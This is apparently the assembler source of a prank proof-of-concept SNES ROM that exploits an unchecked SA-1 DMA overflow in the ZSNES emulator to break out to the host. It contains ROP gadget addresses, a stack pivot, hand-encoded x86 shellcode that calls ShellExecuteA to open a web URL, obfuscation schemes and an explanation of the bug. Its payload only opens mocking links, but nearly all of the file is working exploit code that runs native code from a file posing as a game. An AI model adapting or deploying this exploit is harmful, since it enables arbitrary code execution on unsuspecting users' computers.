;goals:
;disassemble
; done
;locate all usable partial instructions
; done
;locate a victory condition
; open "https://stekiri.files.wordpress.com/2009/09/linus-sucks-large.gif"
; then exit() or continue unharmed
;locate important tables
; IRAM - 08329314
; WRAM - 08362FE0
; reg fn ptr table - 088B37C0 + 0x2100*4
;locate import table
; system() - (pointer to 0xB75AE100)
;locate a strategy to open the browser
; DMA to the DMA regs to waste a small amount of stack
; take control of the stack pointer
;  must set eax to something in these ranges:
;   08329314-08329B14
;   08362FE0-08382FE0
;   the following registers are pushed during DMA handling:
;    eax esi edi ecx edx
;    ebx esp - also harmless to use, ebx is global scratch across zsnes and nobody ever violates esp
;    ebp is danger, though
;   register use during DMA handling:
;    eax - free, initially garbage
;    ebx - SCRATCH; set to garbage between each iteration
;    ecx - UNSAFE; current 'snippet pc' (0x002160 and higher)
;    edx - safe to use temporarily, but 4 is subtracted every fourth iteration, and if <= 4, the loop ends
;    esi - free, initially garbage
;    edi - free, initially garbage
;    ebp - UNSAFE; must be preserved
;  08301470: mov eax, 0x10; ret      [eax=0x00000010]
;  08083484: add eax, 0x832930c; ret [eax=0x0832931C = IRAM+8]
;  0807B4D8: xchg esp, eax; ret      [esp=IRAM+8]
;stack:
; 08303E3D: xchg ebx, eax; ret
;;;;;;;;;;;; 080A14B1: pop edx; ret <- STACK ADDRESS
;;;;;;;;;;;; 08094A05: mov [edx], eax; ret
; 0804E34C: pop eax; ret <- URL
; 0804CC1F: LaunchURL
; 08303E3D: xchg ebx, eax; ret
;;;;;;;;;;;;;;;;; 0804E34C: pop eax; ret <- PLACEHOLDER
; TODO: add stuff to eax? probably not needed
; 0807B4D8: xchg esp, eax; ret
;
;
;0809C3D0: mov [eax], ebx; ret
;08095EC1: mov [eax], edx; ret
;08099BE5: mov [edi], eax; ret
;08098DF1: mov [edi], ebx; ret
;08098BF2: mov [edi], edx; ret
;08094A05: mov [edx], eax; ret

;0804E34C: pop eax; ret
;0804B721: pop ebx; ret
;08089530: pop ecx; ret
;080A14B1: pop edx; ret

org $00FF00
Reset:
XCE
REP #$30

LDY #$3000
LDX.w #IRAM
LDA.w #IRAM_end-IRAM
MVN $00,$00

LDA #SA1Reset
STA $2203
STZ $2200

BRA $FE


;offsets that require finding:
;TempVarSeek (0x08325A74)
;read TempVarSeek (0x08088B6C)
;IRAM (0x08329314)
;regptr (0x088B37C0+(0x2160*4))
;LaunchURL (0x0804CC1F)
; also need to implement 'test eax, eax; jz return' first

;src/cpu/execute.asm execloop - 080C95E0
;starts with D388 05F6 ???? ???? 7502 FF05, aligned to 32
;
SA1Reset:
REP #$20
SEP #$10
LDA #$0780
;0805 - BWRAM pointer
TCD
;0x088B37C0 + 0x2160*4

macro seek(addr)
LDA.w #<addr>&0xFFFF
STA $85
LDA.w #<addr>>>16
STA $87
endmacro
macro write(n, val)
LDA.w #<val>&0xFFFF
STA <n>+$400000
LDA.w #<val>>>16
STA <n>+$400002
endmacro

%seek(0x08325A74) : %write(0, 0x08329314) ; TempVarSeek = (URL pointer)
%seek(0x088B37C0+(0x2160*4))
 %write(0, 0x08088B6C) ; mov eax, [TempVarSeek]
 %write(4, 0x0804CC1F) ; LaunchURL


LDA #$3F00 ; CPU(increment)->PPU(1reg), to register $213F (it's a read register, writing does nothing)
STA $4370
STZ $4373
LDA #$2160 ; CPU address, $002160
STA $4372
STZ $4375 ; 65536 bytes (wraps around and scribbles across all kinds of registers - doesn't really matter)
LDY #$80
STY $420B ; using DMA channel 7 so I can stick trash in %eax and not worry

BRA $FE

;LDA $400000 ; segfault

;LDX.w #Regs_end-Regs-2
;.Loop
;LDA.l Regs,x
;STA.b $400000,x
;DEX
;DEX
;BPL .Loop



;        mov     eax, dword [?_72242]                    ; 08088B6C _ A1, 08325A74(d)

;Regs:
;dd 0x08301470 ; mov eax, 0x10      [eax=0x00000010]
;dd 0x08083484 ; add eax, 0x832930c [eax=0x0832931C = IRAM+8]
;dd 0x0807B4D8 ; xchg esp, eax      [esp=IRAM+8]
;.end

IRAM:
db "https://stekiri.files.wordpress.com/2009/09/linus-sucks-large.gif",0
.end


org $00FFC0
db "ZSNES SUCKS          ";name
db $23;lorom, SA-1
db $35;contains SA-1
db $05;1 bank
db $00;no sram
db $00;ntsc
db $00;licencee
db $00;version
dw $0000,$FFFF;checksum + complement
db $00,$00,$00,$00;unknown stuff
dw $5555,$5555,$FFFF;cop, brk, abort(?)
dw $5555,$FFFF,$5555;nmi, unused, irq
db $00,$00,$00,$00;unknown
dw $FFFF,$FFFF,$FFFF;(emulation) cop, unused, abort
dw $FFFF,Reset,$FFFF;(emulation) nmi, reset, irq/brk


if 0
;TODO:
;32KB /dev/urandom
;write this decryptor straight over that
;for x=0x1FFE;x>=0;x-=2:
;ADC $8000,x
;EOR $A000,x
;SBC $C000,x
;SBC $E001,x
;the last

;0071A6C4 - start of WRAM [where is IRAM?]
;00C62C68 - pointer to romdata
;xxxxxxxx - pointer to wramdata

!Random = $F9D0
!Encrypted = $FBEA

;random numbers:
;$21D0 (used)
;$3220 (used)
;$BAC0 (used)
;$D9D1 (used)
;$7AEA (used)
;$B2B2 (used)
;$C299 (used)
;$603D (used)
;$04B1 (used)

org $008000
incbin random.bin ; fill unused space with crap

org $008000
tiles:   incbin img/tiles.bin ; $8000
tilemap: incbin img/tilemap.bin ; $F000
palette: incbin img/palette.bin  ; $F700
upload: ; $F720 or something (slightly less)

Reset:
;STP
SEI
CLC
XCE
REP #$FF
LDX #$1FF0;Some initializing
TXS
PHK
PLB

LDA #SA1Reset
STA $2203
STZ $2200

SEP #$30
LDA #$80
STA $2100
STZ $4200
STZ $420B
STZ $420C

LDA #$01
STA $2105
STZ $2106
LDA #$70
STA $2107
STZ $210B
STZ $210D
STZ $210D
LDA #$FF
STA $210E
LDA #$07
STA $210E
STZ $2123
LDA #$01
STA $212C
STZ $212D
LDA #$30
STA $2130
STZ $2131
LDA #$E0
STA $2132
STZ $2133

STZ $2121
LDX #$00
REP #$20
LDA #$2200
STA $4300
LDA.w #palette
STA $4302
STX $4304;palette,
LDA #$0020 ; palette is actually slightly smaller, but the remainder isn't used
STA $4305
LDY #$01
STY $420B
SEP #$20

LDA.b #%10000000
STA $2115
REP #$20
STZ $2116
LDA #$1801
STA $4300
LDA.w #tiles;first half of the tile data,
STA $4302
STX $4304
LDA #$7000
STA $4305
LDY #$01
STY $420B

LDY #%10000000
STY $2115
LDA.w #$7000
STA $2116
LDA.w #$1801
STA $4300
LDA.w #tilemap
STA $4302
STX $4304
LDA #$0700
STA $4305
SEP #$20
LDY #$01
STY $420B

LDA #$0F
STA $2100

-
INC.b $00
BRA -

print "muncher upload: ",pc,"/00F800"

warnpc $00F800





org !Encrypted
base $0000

db "GO AWAY",0


;dummy code; not executed, just looks tasty, as if I'm upgrading the SNES PPU (read-only reg.)
LDA #$08
STA $213E
STA $213E
LDA #$28
STA $213E
RTS

skip 6


ADC $7E0000 ; not used either - where does it start?
HackBegin:
print "jmp to ",pc
EOR $7E0000
;TAX ; X = 553C
;SBC $7E0000 ; A = 0018
TAX ; X = 55E0
SBC $7E0000 ; A = FFE0

; if changing these, keep carry in mind
;EOR #$081F ; 0807; WRAM (IRAM) pointer high,low
EOR #$F7E7 ; 0807; WRAM (IRAM) pointer high,low
STA $CBA1,x
ADC #$C3AB ; CBB2; high - data, low - unused random trash
STA $CB9F,x
SBC #$C6B1 ; 0500; high - next location; low - data (07CB 0800 0560 06FB)
STA $CBA0,x
SBC #$FEA0 ; 0660; full results: 05 - 00CBFB60
STA $CBA0,x
EOR #$029B ; 04FB; 04 is a red herring
STA $CBA0,x
BRA HackPart2


skip 5


EvilCode:
db $C7,$05 : dd 0x00CBFB60,0x0045CDAE ; mov [0x00CBFB60],0x0045CDAE ; restore $2180 handler
db $51                                ; push ecx
db $6A, $05                           ; push 5 ; INT nShowCmd = SW_SHOW
db $6A, $00                           ; push 0 ; LPCTSTR lpDirectory
db $6A, $00                           ; push 0 ; LPCTSTR lpParameters
db $68 : dd 0x0071A6C4+TheURL-$0000   ; push __ ; LPCTSTR lpFile
db $6A, $00                           ; push 0 ; LPCTSTR lpOperation
db $6A, $00                           ; push 0 ; HWND hwnd
db $FF,$15 : dd 0x006C81E0            ; call [0x006C81E0] ; ShellExecuteA
db $59                                ; pop ecx
db $C3                                ; ret

TheURL:
db "http://wayback.archive.org/web/2011/byuu.org/bsnes/accuracy",0



LDA #$FF00
STA $43FFFF
STA $00FFFF

HackPart2:

LDA.w #0x0071A6C4+EvilCode-$0000>>16
STA $400002
LDA.w #0x0071A6C4+EvilCode-$0000
STA $400000
-
LDA $217F  ; this triggers it
CMP #$04B1 ; continued execution just continues to read out of bounds
BCS -      ; next value is probably 0000, let's stop
STA $FFFFFF
LDA #$20DB
STA $7FFFFF ; this stores a STP to RAM and JSLs it
JSL $7FFFFF
JSL $7FFFFF
JML $555555


skip 7

;dummy code: pretend to overflow the stack (seems completely safe to me, it just wraps)
LDA #$FFFF
TCS
PLA
PLA
PLA
PLA
LDA #$BAC0
PHA
LDA #$D9D1
PHA
RTL



print "encrypted: ",pc,"/0001FE"
warnpc $01FE







warnpc $00FFC0-64
org $00FFC0-64
rep 15 : db 0
db "Say hi to Nomily! She likes eating bad software.",0
print pc," should be 00FFC0"
org $00FFC0
db "LOL ZSNES ",0xC2,"          ";name (0xC2 is katakana Tsu, the smily kana)
db $23;lorom, SA-1
db $35;contains SA-1
db $05;1 bank
db $00;no sram
db $00;ntsc
db $00;licencee
db $00;version
dw $0000,$FFFF;checksum + complement
;db $00,$00,$00,$00;unknown stuff
;dw $5555,$5555,$FFFF;cop, brk, abort(?)
;dw $5555,$FFFF,$5555;nmi, unused, irq
;db $00,$00,$00,$00;unknown
;dw $FFFF,$FFFF,$FFFF;(emulation) cop, unused, abort
;dw $FFFF,Reset,$FFFF;(emulation) nmi, reset, irq/brk

SA1Reset:
;shove this into the header because screw logic
LDX.w #$FE00
Loop:
;LDA.w !Random+$100,x
;LDA.w !Encrypted+$100,x
SBC.w !Random+$200,x
ADC.w !Encrypted+$200,x
STA $0200,x
INX
INX
BNE Loop
;-
;LDA $0000,x
;INX
;INX
;BRA -
ADC $2137
EOR $213C
PHA ; must be <jmp to X>-1 ($001F)
RTS

print "sa1code: ",pc,"/00FFFC"

warnpc $00FFFC
org $00FFFC
dw Reset































if 0

;Available obfuscations:
;- Execute in RAM, overwrite the current program
;- Use IRQ or NMI to overwrite the current program
;- Use SA-1 to overwrite the current program
;- Fiddle with the PPU timing registers
;- Broken ZSNES ADCs
;- PHK RTS, after some PEA shenanigans, or write the stack from the other processor

;Required hacks:
;decide RAM map
;$0478 - URL start
;$0493 - code start
;
;required data:
;org $0478 ; url
;db                                 $68,$74,$74,$70,$3A,$2F,$2F,$77 ;         http://w
;db $61,$79,$62,$61,$63,$6B,$2E,$61,$72,$63,$68,$69,$76,$65,$2E,$6F ; ayback.archive.o
;db $72,$67,$2F,$77,$65,$62,$2F,$30,$2F,$62,$79,$75,$75,$2E,$6F,$72 ; rg/web/0/byuu.or
;db $67,$2F,$62,$73,$6E,$65,$73,$2F,$61,$63,$63,$75,$72,$61,$63,$79 ; g/bsnes/accuracy
;db $00                                                             ; (nul)
;
;org $0493 ; code
;db             $6A,$05,$6A,$00,$6A,$00,$68,$00,$3C,$AB,$71,$6A,$00
;db $FF,$15,$B4,$27,$D0,$00,$C7,$05,$60,$FB,$CB,$00,$AE,$CD,$45,$00
;db $C3
;
;disassembly:
; push 5 ; INT nShowCmd = SW_SHOW
; push 0 ; LPCTSTR lpDirectory
; push 0 ; LPCTSTR lpParameters
; push 0x0071A6C4+urlloc ; LPCTSTR lpFile
; push 0 ; LPCTSTR lpOperation
; push 0 ; HWND hwnd
; call [0x00D027B4] ; ShellExecuteA
; mov [0x00CBFB60],0x0045CDAE ; restore $2180 handler
; ret
;
;also need a few checksum routines
; one XOR all bytes, one ADC all bytes
;
;current progress:
;org $0478 ; url
;db                                 $  ,$  ,$  ,$  ,$  ,$  ,$  ,$
;db $  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$
;db $  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$
;db $  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$
;db $  
;
;org $0493 ; code
;db             $  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$
;db $  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$  ,$
;db $
;
;
;overwrite BW-RAM pointer via $2180 overflow from SA-1
; allow write access to 0x00CB7560+($2180*4) = 0x00CBFB60, but put part of the offset at the SNES address instead
; also read and math it wildly
;
;write the new pointer (0x0071A6C4 + IRAM pointer) to BWRAM
;
;read $2180 once to trigger my code

assertion_failed = 0
macro assert_label_eq(label, val)
fillbyte 1/cos(<label>-<val>)+assertion_failed
endmacro


macro goto(loc)
warnpc <loc>&$7FFF|$7F8000
org <loc>&$7FFF|$008000
base <loc>&$7FFF|$7F80000
endmacro


!IRAM = 0x0071A6C4
!romdataptr = 0x00C62C68
!NewBWRAM = 0x00CB7560+($2180*4)


org $00FC00
incbin random.bin

org $00FC00
Reset:
;zsnes initializes many regs the way I want
XCE
;P=35 DP=0000 S=01FF
REP #$FF
;P=00

LDA.w #Reset
STA $2203
STZ $2200 ; boot SA-1

macro checksum(eor)
LDX #$FC00
-
ADC $00,x
EOR.w #<eor>
STA $3000
INX
BNE -
SBC $3000
; this makes the other CPU influence it in random ways
endmacro

macro check_write(eor1, eor2)
%checksum(<eor1>)
TAY
%checksum(<eor2>)
STA $00,y
endmacro

;$21D0
;$3220
;$BAC0
;$D9D1
;$7AEA
;$B2B2
;$C299
;$603D
;$04B1


STP

;0071A6C4 - start of IRAM
;00C62C68 - pointer to romdata
;xxxxxxxx - pointer to wramdata




EvilCode:
db $6A,$05,$6A,$00,$6A,$00,$68,$00,$3C,$AB,$71,$6A,$00
db $FF,$15,$B4,$27,$D0,$00,$C7,$05,$60,$FB,$CB,$00,$AE,$CD,$45,$00
db $C3

TheURL:
db "http://wayback.archive.org/web/0/byuu.org/bsnes/accuracy",0

print pc

base off
warnpc $00FFC0

org $0083C0
db "ZSNES SUCKS          ";name
db $23;lorom, SA-1
db $35;contains SA-1
db $05;1 bank
db $00;no sram
db $00;ntsc
db $00;licencee
db $00;version
dw $0000,$FFFF;checksum + complement
db $00,$00,$00,$00;unknown stuff
dw $5555,$5555,$FFFF;cop, brk, abort(?)
dw $5555,$FFFF,$5555;nmi, unused, irq
db $00,$00,$00,$00;unknown
dw $FFFF,$FFFF,$FFFF;(emulation) cop, unused, abort
dw $FFFF,Reset,$FFFF;(emulation) nmi, reset, irq/brk










endif
if 0




;This is an older version. It uses another exploit mechanism that doesn't work on FuSoYa's ZSNES,
; but which is a lot easier to create.

;This ROM, when run in ZSNES v1.51 (official Windows build), will open a web browser on the ZMZ
; download page.
;Thanks to Vitor Vilela for showing me a crashy ROM (I've seen a lot of them, but never managed to
; get my hands on one), and for helpfulness with various SA-1 things.

;The bug is as follows:
;ZSNES does not range check SA-1 DMA, but instead allows them to overflow.
;The critical location is src/chips/sa1regs.asm, executesa1dma:. Using that bug, I can write up to
; 64KB after BW-RAM or I-RAM.

;BW-RAM is 4MB after the ROM. There's nothing interesting nearby, and 64KB isn't enough to overflow
; the allocation (it's about 6MB). Exploiting a heap buffer overflow is also OS dependent.

;However, I-RAM is in a more favorable location; it's a global variable.
;And not only that - right after I-RAM comes a very valuable variable, namely the pointer to BW-RAM!
;Overwriting that allows me to make ZSNES think BW-RAM is whereever I want, allowing me to fiddle
; with one of the opcode dispatch tables. ZSNES doesn't use ASLR, so its location is known.
;Or I can do it the easy way - ZSNES is UPXed, and UPX marks the entire file executable. It's not
; ASLRed either. I can just point to right after the SA-1 DMA loop; I won't even need to worry about
; the instruction cache, x86 automatically invalidates that. Instant victory.
;I'm surprised it has remained hidden for so long.

;The .S files should be assembled with 'nasm filename.S'. A pre-assembled version is included.

org $008000
CPUStart:
CLC
XCE
REP #$FF
LDA #$2200
TCD
SEP #$10

;Step 1 - overwrite SA1RAMArea with a pointer I want to scribble to
;Mode (no conversion, to I-RAM, from ROM)
LDY #%11101000;the 1s are unused by zsnes
STY $30
;Source
LDA.w #.First
STA $32
STZ $34;this hits $2235 too; it does no harm, it's overwritten later
;Size
LDA.w #.First_End-.First
STA $38
;Target offset
LDA #$07FF
STA $35

;Mode (no conversion, to BW-RAM, from ROM)
LDY #%11101100
STY $30
;Source
LDA.w #.Second
STA $32
;not storing to $35, it was done last time
;Size
LDA.w #.Second_End-.Second
STA $38
;Target offset (not clearing the low byte -> offset is $FF, we subtract that from the pointer)
STZ $36

- BRA -

.First:
db 0             ; first byte in I-RAM
db 0             ; I-RAM is 2049 bytes for whatever reason
dd $0AB5         ; PHnum2writesa1reg; seems to only be used for savestates. It's a constant, this is the original value.
dd $0062E2B5-$FF ; SA1RAMArea; the pointer I want to write to. (Luckily, both 65816 and x86 are little endian.)
..End            ; $0062E2B5 is right after the SA-1 DMA loop.
                 ; $FF is subtracted because it's writing to offset [$2235] from the above pointer,
                 ; and I don't clear the low byte of the last transfer.

.Second:
;This one is short and simple; it just loads payload.bin to an unused part of ZSNES (0x006C7D17) and jumps to it.
incbin loader
..End

; payload.S holds dependencies on this one being exactly 19 bytes
; if it's not, the restore code must be changed
your_loader_binary_has_wrong_length = 0
fillbyte 1/cos(.Second+19-..End)+your_loader_binary_has_wrong_length


dd .Payload_End-.Payload
.Payload:
incbin payload
..End

endif
endif